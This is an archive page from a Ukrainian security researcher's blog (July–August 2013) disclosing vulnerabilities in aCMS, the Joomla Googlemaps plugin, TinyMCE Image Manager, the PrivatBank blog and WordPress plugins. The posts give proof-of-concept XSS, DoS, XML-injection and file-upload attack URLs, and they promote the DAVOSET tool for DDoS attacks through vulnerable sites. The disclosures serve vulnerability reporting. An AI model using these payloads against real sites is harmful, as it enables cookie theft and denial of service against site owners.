Архів для категорії 'Уразливості'

Уразливості в плагінах для WordPress №112

23:52 02.08.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах JS Restaurant, Spicy Blogroll та WooCommerce. Для котрих з’явилися експлоіти. JS Restaurant - це плагін для замовлення столику в ресторані, Spicy Blogroll - це плагін для покращення списку блогів, WooCommerce - це е-комерс плагін для створення онлайн-магазину.

  • WordPress JS Restaurant SQL Injection (деталі)
  • WordPress Spicy Blogroll Local File Inclusion (деталі)
  • WordPress WooCommerce 2.0.12 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:27 01.08.2013

В даній добірці уразливості в веб додатках:

  • HP ServiceCenter, Remote Denial of Service (DoS) (деталі)
  • Barnraiser Prairie OpenID idp: Directory traversal attack (деталі)
  • Joomla crypto vulnerability (all versions) (деталі)
  • Apache Geronimo 3 RMI classloader exposure (деталі)
  • HP LeftHand Virtual SAN Appliance hydra, Remote Execution of Arbitrary Code (деталі)

XSS та CS уразливості в aCMS

22:42 31.07.2013

24.05.2013

У квітні, 14.04.2013, я знайшов численні Cross-Site Scripting та Content Spoofing уразливості в aCMS. Про що найближчим часом повідомлю розробникам веб додатку.

Раніше я вже писав про уразливості в aCMS.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

31.07.2013

Cross-Site Scripting (WASC-08):

http://site/assets/js/tiny_mce/plugins/images/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/assets/js/tiny_mce/plugins/images/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Content Spoofing (WASC-12):

http://site/assets/js/tiny_mce/plugins/images/js/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E
http://site/assets/js/tiny_mce/plugins/images/js/swfupload/swfupload.swf?buttonImageURL=http://demo.swfupload.org/v220/images/logo.gif

Вразливі aCMS 1.0 та попередні версії.

DoS і XSS уразливості в Googlemaps для Joomla

23:57 29.07.2013

У липні, 26.07.2013, я знайшов Denial of Service та Cross-Site Scripting уразливості в Googlemaps плагіні для Joomla. Про що вже повідомив розробнику веб додатку.

Раніше я вже писав про численні уразливості в Googlemaps для Joomla. Розробник виправив попередні дірки й переробив проксі функціонал у версії 3.2 плагіна. Але як я перевірив, в ній наявні DoS і XSS уразливості.

Для обходу захисту для доступу до скрипта потрібно вказати реферер (що рівний поточному сайту), кукіс (сесійний, що встановлюється Джумлою) і токена (що береться зі сторінки сайта з плагіном і встановлюється в URL). Ці дані можуть бути взяті з сайту автоматично.

Denial of Service (WASC-10):

http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=google.com&1e17f7d3d74903775e5c524dbe2cd8f1=1

Окрім проведення DoS атак вручну, також можна проводити автоматизовані DoS і DDoS атаки з використанням DAVOSET.

Cross-Site Scripting (WASC-08):

http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site2/xss.html&1e17f7d3d74903775e5c524dbe2cd8f1=1

Уразлива версія Googlemaps plugin v3.2 для Joomla.

Уразливості в плагінах для WordPress №111

23:52 20.07.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Feed, Category-Grid-View-Gallery та WordPress Booking System. Для котрих з’явилися експлоіти. Feed - це плагін для керування RSS-фідами на сайті, Category-Grid-View-Gallery - це плагін для створення галерей зображень, WordPress Booking System - це система продажу білетів.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

16:13 20.07.2013

В даній добірці уразливості в веб додатках:

Численні уразливості на www.blog.privatbank.ua

23:52 19.07.2013

У червні, 28.06.2013, я знайшов Denial of Service, Content Spoofing, Privilege Escalation, Server-Side Request Forgery, Cross-Site Scripting, Full path disclosure та XML External Entities уразливості на сайті http://www.blog.privatbank.ua (блог ПриватБанка). Про що минулого місяця сповістив адміністрацію сайта.

В 2008 році я вже писав про уразливості на www.blog.privatbank.ua, а це нові дірки на цьому сайті. В останнє стосовно ПриватБанка я писав про уразливість в Приват24 для Android.

Ці всі уразливості відносяться до WordPress. Вразлива версія якого використовується на www.blog.privatbank.ua. Раніше я вже писав про численні уразливості в WordPress 3.5.1, що були виправлені у версії 3.5.2. І серед них я детально описав Content Spoofing, Denial of Service, Full path disclosure, Cross-Site Scripting та XML External Entities уразливості. А також навів дві Denial of Service уразливості, що стосуються і WP 3.5.2.

Дані уразливості досі не виправлені, тому що ПриватБанк відмовився це робити (бо цей сайт для них не актуальний). На що я порадив їм закрити сайт і вони пообіцяли подумати над цим.

AFU та XSS уразливості в TinyMCE Image Manager

23:51 18.07.2013

22.05.2013

У квітні, 14.04.2013, я знайшов Arbitrary File Uploading та Cross-Site Scripting уразливості в TinyMCE Image Manager плагіні для TinyMCE. Про що найближчим часом повідомлю розробникам веб додатку.

Раніше я вже писав про уразливості в TinyMCE Image Manager.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

18.07.2013

Arbitrary File Uploading (WASC-31):

Можлива атака через “1.asp” в імені папки. Це обхідний метод для виконання довільного коду на веб сервері IIS.

TinyMCE Image Manager AFU.html

Cross-Site Scripting (WASC-08):

Це persistent XSS на Linux/Unix та reflected XSS на Windows. Код спрацює одразу після відправки запиту на створення папки і в подальшому при запитах до коннектора (при будь-яких операціях, за виключенням створення папки з існуючим іменем).

TinyMCE Image Manager XSS.html

Уразливі TinyMCE Image Manager 1.1 та попередні версії.

Добірка уразливостей

17:20 18.07.2013

В даній добірці уразливості в веб додатках:

Численні уразливості в Googlemaps для Joomla

16:28 16.07.2013

У липні, 15.07.2013, я знайшов Denial of Service, XML Injection, Cross-Site Scripting та Full path disclosure уразливості в Googlemaps плагіні для Joomla. Про що найближчим часом повідомлю розробникам веб додатку.

Denial of Service (WASC-10):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/large_file

Окрім проведення DoS атак вручну, також можна проводити автоматизовані DoS і DDoS атаки з використанням DAVOSET.

XML Injection (WASC-23):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xml.xml

Можна включати зовнішні xml-файли. Що також може бути використано для XSS атаки:

XSS via XML Injection (WASC-23):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xss.xml

Cross-Site Scripting (WASC-08):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure (WASC-13):

http://site/plugins/content/plugin_googlemap2_proxy.php

Окрім plugin_googlemap2_proxy.php, також трапляється plugin_googlemap3_proxy.php (але він має інший шлях на сайтах).

Уразливі Googlemaps plugin for Joomla версії 2.x, 3.x та потенційно попередні версії. В новій версії DAVOSET я додам чимало сайтів з цим Googlemaps плагіном.